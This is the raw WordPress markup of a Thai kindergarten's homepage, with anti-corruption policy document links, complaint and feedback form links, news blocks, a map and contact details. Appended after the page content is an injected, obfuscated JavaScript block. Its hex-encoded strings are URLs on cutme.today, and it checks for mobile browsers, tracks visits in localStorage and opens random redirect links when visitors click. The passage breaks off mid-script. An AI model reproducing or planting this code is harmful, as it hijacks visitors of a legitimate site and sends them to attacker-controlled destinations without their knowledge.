data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 